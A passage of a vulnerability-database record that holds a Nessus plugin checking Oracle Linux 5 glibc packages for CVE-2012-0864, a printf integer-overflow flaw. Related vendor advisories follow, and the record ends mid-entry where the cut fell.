{"id": "ORACLELINUX_ELSA-2012-0397.NASL", "bulletinFamily": "scanner", "title": "Oracle Linux 5 : glibc (ELSA-2012-0397)", "description": "From Red Hat Security Advisory 2012:0397 :\n\nUpdated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain a patch to resolve this issue.", "published": "2013-07-12T00:00:00", "modified": "2013-07-12T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/68498", "reporter": "This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://oss.oracle.com/pipermail/el-errata/2012-March/002705.html"], "cvelist": ["CVE-2012-0864"], "type": "nessus", "lastseen": "2020-09-25T08:55:15", "edition": 20, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-0864"]}, {"type": "centos", "idList": ["CESA-2012:0393", "CESA-2012:0397"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0397", "ELSA-2012-0393"]}, {"type": "amazon", "idList": ["ALAS-2012-057"]}, {"type": "redhat", "idList": ["RHSA-2012:0488", "RHSA-2012:0393", "RHSA-2012:0397", "RHSA-2012:0531"]}, {"type": "nessus", "idList": ["FEDORA_2012-2144.NASL", "FEDORA_2012-2123.NASL", "REDHAT-RHSA-2012-0393.NASL", "REDHAT-RHSA-2012-0397.NASL", "CENTOS_RHSA-2012-0397.NASL", "FEDORA_2012-2162.NASL", "SL_20120319_GLIBC_ON_SL5_X.NASL", "ALA_ALAS-2012-57.NASL", "ORACLELINUX_ELSA-2012-0393.NASL", "CENTOS_RHSA-2012-0393.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123952", "OPENVAS:1361412562310881113", "OPENVAS:1361412562310881169", "OPENVAS:864432", "OPENVAS:1361412562310863924", "OPENVAS:1361412562310870673", "OPENVAS:1361412562310123951", "OPENVAS:863924", "OPENVAS:870673", "OPENVAS:1361412562310120410"]}, {"type": "fedora", "idList": ["FEDORA:7635A20E7B", "FEDORA:3722721573", "FEDORA:A7A8121248", "FEDORA:71D9321EDD"]}, {"type": "zdt", "idList": ["1337DAY-ID-20717"]}, {"type": "seebug", "idList": ["SSV:78801"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D0C0ABEBB66F120575911D213A03B73B"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12241", "SECURITYVULNS:DOC:27743", "SECURITYVULNS:DOC:28907"]}, {"type": "gentoo", "idList": ["GLSA-201312-01"]}, {"type": "ubuntu", "idList": ["USN-1396-1"]}, {"type": "vmware", "idList": ["VMSA-2012-0018", "VMSA-2012-0013"]}], "modified": "2020-09-25T08:55:15", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2020-09-25T08:55:15", "rev": 2}, "vulnersScore": 7.0}, "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0397 and \n# Oracle Linux Security Advisory ELSA-2012-0397 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68498);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_bugtraq_id(52201);\n script_xref(name:\"RHSA\", value:\"2012:0397\");\n\n script_name(english:\"Oracle Linux 5 : glibc (ELSA-2012-0397)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0397 :\n\nUpdated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain a patch to resolve this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002705.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"glibc-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-common-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-devel-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-headers-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-utils-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"nscd-2.5-81.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n}\n", "naslFamily": "Oracle Linux Local Security Checks", "pluginID": "68498", "cpe": ["p-cpe:/a:oracle:linux:nscd", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc"], "scheme": null}

{"cve": [{"lastseen": "2020-10-03T12:06:00", "description": "Integer overflow in the vfprintf function in stdio-common/vfprintf.c in glibc 2.14 and other versions allows context-dependent attackers to bypass the FORTIFY_SOURCE protection mechanism, conduct format string attacks, and write to arbitrary memory via a large number of arguments.", "edition": 3, "cvss3": {}, "published": "2013-05-02T14:55:00", "title": "CVE-2012-0864", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0864"], "modified": "2013-05-03T04:00:00", "cpe": ["cpe:/a:gnu:glibc:2.14"], "id": "CVE-2012-0864", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0864", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.14:*:*:*:*:*:*:*"]}], "centos": [{"lastseen": "2019-12-20T18:28:55", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0397\n\n\nThe glibc packages provide the standard C and standard math libraries used\nby multiple programs on the system. Without these libraries, the Linux\nsystem cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass FORTIFY_SOURCE\nprotections and execute arbitrary code using a format string flaw in an\napplication, even though these protections are expected to limit the impact\nof such flaws to an application abort. (CVE-2012-0864)\n\nAll users of glibc are advised to upgrade to these updated packages, which\ncontain a patch to resolve this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-March/030544.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0397.html", "edition": 3, "modified": "2012-03-20T02:12:41", "published": "2012-03-20T02:12:41", "href": "http://lists.centos.org/pipermail/centos-announce/2012-March/030544.html", "id": "CESA-2012:0397", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:27:41", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0393\n\n\nThe glibc packages provide the standard C and standard math libraries used\nby multiple programs on the system. Without these libraries, the Linux\nsystem cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass FORTIFY_SOURCE\nprotections and execute arbitrary code using a format string flaw in\nan application, even though these protections are expected to limit the\nimpact of such flaws to an application abort. (CVE-2012-0864)\n\nThis update also fixes the following bugs:\n\n* Previously, the dynamic loader generated an incorrect ordering for\ninitialization according to the ELF specification. This could result in\nincorrect ordering of DSO constructors and destructors. With this update,\ndependency resolution has been fixed. (BZ#783999)\n\n* Previously, locking of the main malloc arena was incorrect in the retry\npath. This could result in a deadlock if an sbrk request failed. With this\nupdate, locking of the main arena in the retry path has been fixed. This\nissue was exposed by a bug fix provided in the RHSA-2012:0058 update.\n(BZ#795328)\n\n* Calling memcpy with overlapping arguments on certain processors would\ngenerate unexpected results. While such code is a clear violation of\nANSI/ISO standards, this update restores prior memcpy behavior. (BZ#799259)\n\nAll users of glibc are advised to upgrade to these updated packages, which\ncontain patches to resolve these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-March/030541.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0393.html", "edition": 3, "modified": "2012-03-15T22:58:20", "published": "2012-03-15T22:58:20", "href": "http://lists.centos.org/pipermail/centos-announce/2012-March/030541.html", "id": "CESA-2012:0393", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:07", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "[2.5-81.el5_8.1]\n- Add dist tag\n[when building file lists (#784646).]\n- Avoid nargs integer overflow which could be used to bypass FORTIFY_SOURCE (#794813)", "edition": 4, "modified": "2012-03-19T00:00:00", "published": "2012-03-19T00:00:00", "id": "ELSA-2012-0397", "href": "http://linux.oracle.com/errata/ELSA-2012-0397.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:15", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "[2.12-1.47.el6_2.9]\n- Always use another area after a failed allocation in the\n main arena (#795328)\n - Remove sse3 memcpy (#695812) changes (#799259)\n[2.12-1.47.el6_2.8]\n- Avoid nargs integer overflow which could be used to bypass FORTIFY_SOURCE (#794815)\n[2.12-1.47.el6_2.7]\n- Fix locking on malloc family retry paths (#795328)\n[2.12-1.47.el6_2.6]\n- Fix cycle detection in dynamic loader (#783999)", "edition": 4, "modified": "2012-03-15T00:00:00", "published": "2012-03-15T00:00:00", "id": "ELSA-2012-0393", "href": "http://linux.oracle.com/errata/ELSA-2012-0393.html", "title": "glibc security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "**Issue Overview:**\n\nAn integer overflow flaw was found in the implementation of the printf functions family. This could allow an attacker to bypass FORTIFY_SOURCE protections and execute arbitrary code using a format string flaw in an application, even though these protections are expected to limit the impact of such flaws to an application abort. ([CVE-2012-0864 __](<https://access.redhat.com/security/cve/CVE-2012-0864>))\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-static-2.12-1.47.37.amzn1.i686 \n glibc-debuginfo-common-2.12-1.47.37.amzn1.i686 \n glibc-utils-2.12-1.47.37.amzn1.i686 \n glibc-devel-2.12-1.47.37.amzn1.i686 \n glibc-2.12-1.47.37.amzn1.i686 \n glibc-common-2.12-1.47.37.amzn1.i686 \n glibc-headers-2.12-1.47.37.amzn1.i686 \n glibc-debuginfo-2.12-1.47.37.amzn1.i686 \n nscd-2.12-1.47.37.amzn1.i686 \n \n src: \n glibc-2.12-1.47.37.amzn1.src \n \n x86_64: \n nscd-2.12-1.47.37.amzn1.x86_64 \n glibc-devel-2.12-1.47.37.amzn1.x86_64 \n glibc-debuginfo-common-2.12-1.47.37.amzn1.x86_64 \n glibc-2.12-1.47.37.amzn1.x86_64 \n glibc-headers-2.12-1.47.37.amzn1.x86_64 \n glibc-debuginfo-2.12-1.47.37.amzn1.x86_64 \n glibc-static-2.12-1.47.37.amzn1.x86_64 \n glibc-utils-2.12-1.47.37.amzn1.x86_64 \n glibc-common-2.12-1.47.37.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2012-03-23T14:15:00", "published": "2012-03-23T14:15:00", "id": "ALAS-2012-057", "href": "https://alas.aws.amazon.com/ALAS-2012-57.html", "title": "Medium: glibc", "type": "amazon", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:45", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "The glibc packages provide the standard C and standard math libraries used\nby multiple programs on the system. Without these libraries, the Linux\nsystem cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass FORTIFY_SOURCE\nprotections and execute arbitrary code using a format string flaw in an\napplication, even though these protections are expected to limit the impact\nof such flaws to an application abort. (CVE-2012-0864)\n\nAll users of glibc are advised to upgrade to these updated packages, which\ncontain a patch to resolve this issue.\n", "modified": "2017-09-08T12:14:35", "published": "2012-03-19T04:00:00", "id": "RHSA-2012:0397", "href": "https://access.redhat.com/errata/RHSA-2012:0397", "type": "redhat", "title": "(RHSA-2012:0397) Moderate: glibc security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:35", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "The glibc packages provide the standard C and standard math libraries used\nby multiple programs on the system. Without these libraries, the Linux\nsystem cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass FORTIFY_SOURCE\nprotections and execute arbitrary code using a format string flaw in\nan application, even though these protections are expected to limit the\nimpact of such flaws to an application abort. (CVE-2012-0864)\n\nThis update also fixes the following bugs:\n\n* Previously, the dynamic loader generated an incorrect ordering for\ninitialization according to the ELF specification. This could result in\nincorrect ordering of DSO constructors and destructors. With this update,\ndependency resolution has been fixed. (BZ#783999)\n\n* Previously, locking of the main malloc arena was incorrect in the retry\npath. This could result in a deadlock if an sbrk request failed. With this\nupdate, locking of the main arena in the retry path has been fixed. This\nissue was exposed by a bug fix provided in the RHSA-2012:0058 update.\n(BZ#795328)\n\n* Calling memcpy with overlapping arguments on certain processors would\ngenerate unexpected results. While such code is a clear violation of\nANSI/ISO standards, this update restores prior memcpy behavior. (BZ#799259)\n\nAll users of glibc are advised to upgrade to these updated packages, which\ncontain patches to resolve these issues.\n", "modified": "2018-06-06T20:24:36", "published": "2012-03-15T04:00:00", "id": "RHSA-2012:0393", "href": "https://access.redhat.com/errata/RHSA-2012:0393", "type": "redhat", "title": "(RHSA-2012:0393) Moderate: glibc security and bug fix update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:34", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3045", "CVE-2011-4128", "CVE-2012-0864", "CVE-2012-0884", "CVE-2012-1165", "CVE-2012-1569", "CVE-2012-1573", "CVE-2012-1583"], "description": "The rhev-hypervisor5 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way libtasn1 decoded DER data. An attacker could\ncreate a carefully-crafted X.509 certificate that, when parsed by an\napplication that uses GnuTLS, could cause the application to crash.\n(CVE-2012-1569)\n\nA flaw was found in the way GnuTLS decrypted malformed TLS records. This\ncould cause a TLS/SSL client or server to crash when processing a\nspecially-crafted TLS record from a remote TLS/SSL connection peer.\n(CVE-2012-1573)\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass FORTIFY_SOURCE\nprotections and execute arbitrary code using a format string flaw in an\napplication, even though these protections are expected to limit the\nimpact of such flaws to an application abort. (CVE-2012-0864)\n\nRed Hat would like to thank Matthew Hall of Mu Dynamics for reporting\nCVE-2012-1569 and CVE-2012-1573.\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2011-4128 (gnutls issue)\n\nCVE-2012-1583 (kernel issue)\n\nCVE-2011-3045 (libpng issue)\n\nCVE-2012-0884 and CVE-2012-1165 (openssl issues)\n\nFurther information on the changes made to the package is available on the\nrelevant errata:\n\nhttps://rhn.redhat.com/errata/RHBA-2012-0398.html\n\nUsers of Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which fixes these issues.\n", "modified": "2019-03-22T23:44:58", "published": "2012-04-17T04:00:00", "id": "RHSA-2012:0488", "href": "https://access.redhat.com/errata/RHSA-2012:0488", "type": "redhat", "title": "(RHSA-2012:0488) Important: rhev-hypervisor5 security and bug fix update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:37", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4128", "CVE-2012-0060", "CVE-2012-0061", "CVE-2012-0815", "CVE-2012-0864", "CVE-2012-0879", "CVE-2012-0884", "CVE-2012-1090", "CVE-2012-1097", "CVE-2012-1165", "CVE-2012-1569", "CVE-2012-1573"], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way libtasn1 decoded DER data. An attacker could\ncreate carefully-crafted DER encoded input (such as an X.509 certificate)\nthat, when parsed by an application that uses libtasn1 (such as\napplications using GnuTLS), could cause the application to crash.\n(CVE-2012-1569)\n\nA flaw was found in the way GnuTLS decrypted malformed TLS records. This\ncould cause a TLS/SSL client or server to crash when processing a\nspecially-crafted TLS record from a remote TLS/SSL connection peer.\n(CVE-2012-1573)\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass FORTIFY_SOURCE\nprotections and execute arbitrary code using a format string flaw in an\napplication, even though these protections are expected to limit the\nimpact of such flaws to an application abort. (CVE-2012-0864)\n\nRed Hat would like to thank Matthew Hall of Mu Dynamics for reporting\nCVE-2012-1569 and CVE-2012-1573.\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2011-4128 (gnutls issue)\n\nCVE-2012-0879, CVE-2012-1090, and CVE-2012-1097 (kernel issues)\n\nCVE-2012-0884 and CVE-2012-1165 (openssl issues)\n\nCVE-2012-0060, CVE-2012-0061, and CVE-2012-0815 (rpm issues)\n\nThis update also fixes the following bug:\n\n* The Hypervisor previously set the lro_disable option for the enic driver.\nThe driver does not support this option, as a result the Hypervisor did\nnot correctly detect and configure the network interfaces of a Cisco M81KR\nadaptor, when present. The Hypervisor has been updated and no longer sets\nthe invalid option for this driver. (BZ#809463)\n\nUsers of Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which fixes these issues.\n", "modified": "2018-06-07T08:59:46", "published": "2012-04-30T04:00:00", "id": "RHSA-2012:0531", "href": "https://access.redhat.com/errata/RHSA-2012:0531", "type": "redhat", "title": "(RHSA-2012:0531) Important: rhev-hypervisor6 security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "The glibc package contains standard libraries which are used by multiple programs on the system. In order to save disk space and memory, as well as to make upgrading easier, common system code is kept in one place and shared between programs. This particular package contains the most important sets of shared libraries: the standard C library and the standard math library. Without these two libraries, a Linux system will not function. ", "modified": "2012-03-08T05:00:09", "published": "2012-03-08T05:00:09", "id": "FEDORA:A7A8121248", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: glibc-2.14.1-6", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "The glibc package contains standard libraries which are used by multiple programs on the system. In order to save disk space and memory, as well as to make upgrading easier, common system code is kept in one place and shared between programs. This particular package contains the most important sets of shared libraries: the standard C library and the standard math library. Without these two libraries, a Linux system will not function. ", "modified": "2012-03-08T03:55:46", "published": "2012-03-08T03:55:46", "id": "FEDORA:7635A20E7B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: glibc-2.14.1-6", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "The glibc package contains standard libraries which are used by multiple programs on the system. In order to save disk space and memory, as well as to make upgrading easier, common system code is kept in one place and shared between programs. This particular package contains the most important sets of shared libraries: the standard C library and the standard math library. Without these two libraries, a Linux system will not function. ", "modified": "2012-02-25T08:36:01", "published": "2012-02-25T08:36:01", "id": "FEDORA:3722721573", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: glibc-2.14.90-24.fc16.6", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "The glibc package contains standard libraries which are used by multiple programs on the system. In order to save disk space and memory, as well as to make upgrading easier, common system code is kept in one place and shared between programs. This particular package contains the most important sets of shared libraries: the standard C library and the standard math library. Without these two libraries, a Linux system will not function. ", "modified": "2012-02-28T11:00:00", "published": "2012-02-28T11:00:00", "id": "FEDORA:71D9321EDD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: glibc-2.15-23.fc17", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-09-25T08:55:15", "description": "From Red Hat Security Advisory 2012:0393 :\n\nUpdated glibc packages that fix one security issue and three bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nThis update also fixes the following bugs :\n\n* Previously, the dynamic loader generated an incorrect ordering for\ninitialization according to the ELF specification. This could result\nin incorrect ordering of DSO constructors and destructors. With this\nupdate, dependency resolution has been fixed. (BZ#783999)\n\n* Previously, locking of the main malloc arena was incorrect in the\nretry path. This could result in a deadlock if an sbrk request failed.\nWith this update, locking of the main arena in the retry path has been\nfixed. This issue was exposed by a bug fix provided in the\nRHSA-2012:0058 update. (BZ#795328)\n\n* Calling memcpy with overlapping arguments on certain processors\nwould generate unexpected results. While such code is a clear\nviolation of ANSI/ISO standards, this update restores prior memcpy\nbehavior. (BZ#799259)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain patches to resolve these issues.", "edition": 20, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 6 : glibc (ELSA-2012-0393)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:nscd", "p-cpe:/a:oracle:linux:glibc-devel", 